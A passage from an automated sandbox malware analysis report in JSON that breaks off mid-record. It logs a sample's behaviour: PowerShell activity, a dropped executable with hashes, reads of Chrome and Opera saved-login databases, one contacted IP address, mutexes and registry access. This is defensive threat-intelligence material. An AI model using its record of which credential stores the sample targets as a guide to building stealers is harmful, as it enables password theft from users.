{ "analysis_details": { "creation_time": "2017-12-20 15:26 (UTC+1)", "execution_successful": true, "number_of_processes": 9, "reputation_enabled": true, "termination_reason": "timeout", "type": "analysis_details", "version": 2, "vm_analysis_duration_time": "00:02:20" }, "artifacts": { "files": [ { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_OUTPUT_HANDLE", "hashes": [], "norm_filename": "std_output_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_ERROR_HANDLE", "hashes": [], "norm_filename": "std_error_handle", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": 
"c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access", "read" 
], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32", "hashes": [], "norm_filename": "c:\\windows\\system32", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows", "hashes": [], "norm_filename": "c:\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { 
"filename": "C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Temp\\lambdoidtegument.exe", "hashes": [ { "md5_hash": "437efd63bf864669ef4312750c25c462", "sha1_hash": "247f0b1576c24e50830f6ee326dce494c6ba478d", "sha256_hash": "c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\ntdll.dll", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\System32\\cmmon32.exe", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\cmmon32.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Temp\\lambdoidtegument.exe", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\temp\\lambdoidtegument.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", 
"hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Windows\\System32\\drivers\\etc\\hosts", "hashes": [], "norm_filename": "\\??\\c:\\windows\\system32\\drivers\\etc\\hosts", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", "hashes": [], "norm_filename": "\\??\\c:\\program files\\crfitq6x\\gdigzvh.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlog.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\ololog.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrc.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologrc.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera software\\opera stable\\login data", "operations": [ "access" ], "type": 
"file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\OLO0NDS-\\OLOlogrv.ini", "hashes": [], "norm_filename": "\\??\\c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologrv.ini", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", "hashes": [], "norm_filename": "\\??\\c:\\program files\\mozilla firefox\\firefox.exe", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp", "hashes": [], "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "192.232.251.15", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\.net clr networking", "operations": [ "delete", "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Nameless", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "664908S9UTEIZ6MN", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "OLO0NDS-0AXWwKzG", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ARIA_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_DISPPARAMS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_PRIVATE_FONT_SETTING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CSS_SHOW_HIDE_EVENTS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DISPLAY_NODE_ADVISE_KB833311", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ALLOW_EXPANDURI_BYPASS", "type": "registry_artifact", 
"version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DATABINDING_SUPPORT", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENFORCE_BSTR", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl\\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_CLEANUP_AT_FLS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": 
"registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_DOCUMENT_COMPATIBLE_MODE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_WEBOC_DOCUMENT_ZOOM", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PageSetup", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_XSSFILTER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet 
Explorer\\Main\\FeatureControl\\FEATURE_MSHTML_AUTOLOAD_IEFRAME", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Script\\Features", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\COM3", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": 
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key 
Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": 
